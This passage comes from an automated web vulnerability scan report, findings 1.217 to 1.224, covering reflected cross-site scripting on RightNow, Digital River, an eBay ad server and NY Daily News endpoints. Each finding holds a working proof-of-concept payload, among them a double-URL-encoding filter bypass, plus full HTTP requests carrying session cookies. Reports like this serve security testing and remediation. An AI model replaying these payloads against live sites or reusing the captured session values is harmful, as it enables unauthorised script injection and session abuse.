qO_cUfkopA2xfpIBhRox0ZmWkUrqTyu8JH_z0ENM260PQgOF_6lsYSpAhZeTTiigz8q5AuMebp7B5hGpcN4tEc6x47HUnTD2CkRO96Z1NoeRYqA%21%21; path=/; httponly
RNT-Time: D=263512 t=1314820315605217
RNT-Machine: 20
Vary: Accept-Encoding
Content-Length: 37814
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="no_wrapper" xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:la
...[SNIP]...
<a id="rn_FloatboxRedirectLink_19" class="permalink" href="http://www.rightnow.com/sso-thanks.php15082"><script>alert(1)</script>6008e264d60?redirect=http%3A%2F%2Fcrm.rightnow.com%2Fapp%2Futils%2Fcreate_account">
...[SNIP]...

1.217. http://crm.rightnow.com/app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.rightnow.com
Path:   /app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc3c2ed414 was submitted in the REST URL parameter 5. This input was echoed as f2e2f"><script>alert(1)</script>1cc3c2ed414 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.phpf2e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc3c2ed414 HTTP/1.1
Host: crm.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUsIbjDPvwtWKjEbeoDdDP2oIs%7EXKwlWDXSFfP1wLjJkymobcfQJ1FnQh4qCshV42J9jAzkTD6vwgoBjxOlHqoYdsnLJ5cqlIXurn1GfLOke0sTztst%7Ebumdh3femO3bcVtHxAIksT7ndD170pheWiKw0L6KYBS7rj

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:19 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUV_xO1D%7E6wdMUuFd97XofG3D%7EDDK0HGusTTVorlmY_74hHqt0aG7nDYW0_vVFiz59xWEdGqpvXKq3evbdTCn_QLL6qCgJ1c8hXFfKBlwjEA3zCTy5Vkg2FRQ_P5JqZCXYAuQepmsJW6lvcCXM5SFLrXj8HttwYCS4optkDe2iMjCARtlhWmm6J3pHmLiDTf855z7hZc%7E1HwkxzcvsEN3v83GcrQmAdCQQw4Gv3rXRq0LkmgUYEMwsCcz3LcdtGJ5fE%7EG12wVItLkuoUc1T792KP9202ZSi5JMLmPxN_BiQsOE2W22jMLYod7AE2WDhpsE16Z8Jz5dQA3mIvYIDtgl_q3nAlP4%7EwpJIkS14tlGlAkW6XXdJ909DAZlzcDxC6VBYwewkiCOo14Jo_m2jX0_xyZ4qc1nGGFs8Aergb1XO0kClNM4Y1s8g9ocUJpoFMVhFPfmP3V%7E%7E7J_ejfixb2vSRh6FpUGEb1Cs4CEUXUqHzgmD_Pi3xhk94EkcsSX8NBahluyNucjfK7H0ed7RhZ65FYn_SrlDy75W5awygsdV6LpP7rHjK2CDYdRDpUtS92D7qnc6A5a4JPRAg0RbQM9t7PWo1AAbwfnvphk8GPhcQWZcv_B0RqGb3gG578hipUIC1RrLJed6NRgLk_DD%7E7%7EQvdhbEuxbxMiXsAEEJQFwna%7ExAfflSEgZVJ0R36Lb8VekvWXLnzPgB1qD1j%7E%7EXdjasQee5U_qKIXOImWpfk0PrfFQzjleyurWMETNPe919pbj2r4q4gI4Os%21; path=/; httponly
RNT-Time: D=232930 t=1314814579813696
RNT-Machine: 20
Vary: Accept-Encoding
Content-Length: 8164
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="no_wrapper" xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:la
...[SNIP]...
<a id="rn_FloatboxRedirectLink_2" class="permalink" href="http://www.rightnow.com/sso-thanks.phpf2e2f"><script>alert(1)</script>1cc3c2ed414?redirect=http%3A%2F%2Fcrm.rightnow.com%2Fapp%2Futils%2Faccount_assistance">
...[SNIP]...

1.218. http://drh.img.digitalriver.com/DRHM/store [Action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c09'%3balert(1)//4faa26409b6 was submitted in the Action parameter. This input was echoed as f3c09';alert(1)//4faa26409b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DRHM/store?Action=DisplayPagef3c09'%3balert(1)//4faa26409b6&SiteID=adbevlus&Locale=en_US&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet44839%27%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css
Cookie: op_refUrl=http%3A//www.fakereferrerdominator.com/referrerpathname%3Frefparname%3Drefvalue; op_browser=mozilla_1.9.2.13; op_os=windows; op_browserHigh=mozilla; RefURL=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; fcOOS=fcOptOutChip=undefined; fcC=X=C801321249&Y=1314797131799&FV=-1&H=1314797131698&Z=0&E=2283193&F=0; fcP=C=0&T=1314797131799&DTO=1314797131698&U=801321249&V=1314797131698; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//drh.img.digitalriver.com/store%3FAction%3DDisplayContentManagerStyleSheet44839%2527%253balert%281%29//c075691c24c%26SiteID%3Dadbevlus%26StyleID%3D35830700%26StyleVersion%3D17%26styleIncludeFile%3Dstyle.css; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:25:22 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=96516770448,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app71
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:25:22 GMT
Date: Wed, 31 Aug 2011 13:25:22 GMT
Content-Length: 39610
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script type="text/javascript"
...[SNIP]...
Type'],
attributes: ['platform']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayPagef3c09';alert(1)//4faa26409b6',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=adbevlus&Locale=en_US&nextAction=DisplayPagef3c09';alert(1)//4faa26409b6&StyleID=35830700&Style
...[SNIP]...

1.219. http://drh.img.digitalriver.com/store [Action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44839'%3balert(1)//c075691c24c was submitted in the Action parameter. This input was echoed as 44839';alert(1)//c075691c24c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayContentManagerStyleSheet44839'%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://volumelicensing.adobe.com/store/adbevlus/en_US/pd/ProductID.230278700?af0f8--%3E%3Cscript%3Ealert(document.location)%3C/script%3Ebb99325cab5=1

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:16:04 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=23501754707,0)
Content-Length: 39650
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app77
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:16:04 GMT
Date: Wed, 31 Aug 2011 13:16:04 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script type="text/javascript"
...[SNIP]...
tes: ['platform']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayContentManagerStyleSheet44839';alert(1)//c075691c24c',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=adbevlus&Locale=en_US&nextAction=DisplayContentManagerStyleSheet44839';alert(1)//c075691c24c&St
...[SNIP]...

1.220. http://ebay.adnxs.com/ttj [pt1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad198'-alert(1)-'f60f448d4b0 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=553109&cb=6612185646&pt1=0000805764ad198'-alert(1)-'f60f448d4b0&pt2=0001017406&pt3=1183&imp_id=v2:I:1313102118:6612185646:0000805764:0001017406:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000805764/mnum=0001017406/cstr=2758506=_4e445926,6612185646,805764^1017406^1183^0,1_/xsxdata=$XSXDATA/bnum=2758506/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImKQDEAoYAiACKAIwv_v88QQQv_v88QQYAQ..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W^#Wxroe5'Qr*isq44:$W)PwtCL3Wkk.A$=koM-QuhP/]Koq9!Np4.bwxgRWIv/%+A:(Sm-lS>S/<%G(qFQ657r2SJx@>1BJcXdvLbw%eg@.oeBE[0W*!?=d3UhDo(M5j%8QLDVbUf/cTK7Tu/h$*'[v-OIQ?^J[pX.=us9OGX%wo_^V(; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYAiACKAIw_bKR8gQQ_bKR8gQYAQ..; path=/; expires=Wed, 09-Nov-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRorYewj6(wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*8`-TqPif; path=/; expires=Wed, 09-Nov-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 11 Aug 2011 22:36:45 GMT
Content-Length: 1239

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/77160/4?mpt=1313102205}&Perf_Tracker_1=0000805764ad198'-alert(1)-'f60f448d4b0&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183&ext_id=5475285200138681784&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344452&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAE
...[SNIP]...

1.221. http://ebay.adnxs.com/ttj [pt2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52654'-alert(1)-'99b1aa3f16d was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=553109&cb=6612185646&pt1=0000805764&pt2=000101740652654'-alert(1)-'99b1aa3f16d&pt3=1183&imp_id=v2:I:1313102118:6612185646:0000805764:0001017406:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000805764/mnum=0001017406/cstr=2758506=_4e445926,6612185646,805764^1017406^1183^0,1_/xsxdata=$XSXDATA/bnum=2758506/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImKQDEAoYAiACKAIwv_v88QQQv_v88QQYAQ..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W^#Wxroe5'Qr*isq44:$W)PwtCL3Wkk.A$=koM-QuhP/]Koq9!Np4.bwxgRWIv/%+A:(Sm-lS>S/<%G(qFQ657r2SJx@>1BJcXdvLbw%eg@.oeBE[0W*!?=d3UhDo(M5j%8QLDVbUf/cTK7Tu/h$*'[v-OIQ?^J[pX.=us9OGX%wo_^V(; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYAiACKAIwjbOR8gQQjbOR8gQYAQ..; path=/; expires=Wed, 09-Nov-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRp%^ex]h1wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*B@yUR1!h; path=/; expires=Wed, 09-Nov-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 11 Aug 2011 22:37:01 GMT
Content-Length: 1239

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/77160/4?mpt=1313102221}&Perf_Tracker_1=0000805764&Perf_Tracker_2=000101740652654'-alert(1)-'99b1aa3f16d&Perf_Tracker_3=1183&ext_id=2608476615395181280&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344452&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAA
...[SNIP]...

1.222. http://ebay.adnxs.com/ttj [pt3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b254c'-alert(1)-'3820416d3a8 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=553109&cb=6612185646&pt1=0000805764&pt2=0001017406&pt3=1183b254c'-alert(1)-'3820416d3a8&imp_id=v2:I:1313102118:6612185646:0000805764:0001017406:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000805764/mnum=0001017406/cstr=2758506=_4e445926,6612185646,805764^1017406^1183^0,1_/xsxdata=$XSXDATA/bnum=2758506/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImKQDEAoYAiACKAIwv_v88QQQv_v88QQYAQ..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W^#Wxroe5'Qr*isq44:$W)PwtCL3Wkk.A$=koM-QuhP/]Koq9!Np4.bwxgRWIv/%+A:(Sm-lS>S/<%G(qFQ657r2SJx@>1BJcXdvLbw%eg@.oeBE[0W*!?=d3UhDo(M5j%8QLDVbUf/cTK7Tu/h$*'[v-OIQ?^J[pX.=us9OGX%wo_^V(; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYAiACKAIwoLOR8gQQoLOR8gQYAQ..; path=/; expires=Wed, 09-Nov-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRp%^ex]h1wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*B@yUR1!h; path=/; expires=Wed, 09-Nov-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 11 Aug 2011 22:37:20 GMT
Content-Length: 1239

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/77160/4?mpt=1313102240}&Perf_Tracker_1=0000805764&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183b254c'-alert(1)-'3820416d3a8&ext_id=2984424249090132697&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344452&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANlKFNoKzmop-HCZRD1j
...[SNIP]...

1.223. http://events.nydailynews.com/json [jsonsp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /json

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload aa7d0<script>alert(1)</script>09589a620ba was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?fields=id,name,zurl&has_editors_pick=454&jsonsp=Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba&limit=3&search=true&srss=6&st=event&when=today HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 50.23.123.106
X-Runtime: 47
ETag: "ed2f54a50d5601d0052c97baa13fdce9"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www29
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; path=/; expires=Fri, 11-Nov-2011 22:35:21 GMT; HttpOnly
Content-Length: 1095

Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stomp","id":175823405,"startTime":"Thu Aug 11 20:00:00 UTC 2011","endTime":null,"zurl":"/new-york-ny/events/show/175823405-stomp"},{"name"
...[SNIP]...

1.224. http://events.nydailynews.com/json [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /json

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 67f36<script>alert(1)</script>5a44214f354 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?fields=id,name,zurl&has_editors_pick=454&jsonsp=Zvents_load_ZventsWidget1&limit=3&search=true&srss=6&st=event67f36<script>alert(1)</script>5a44214f354&when=today HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
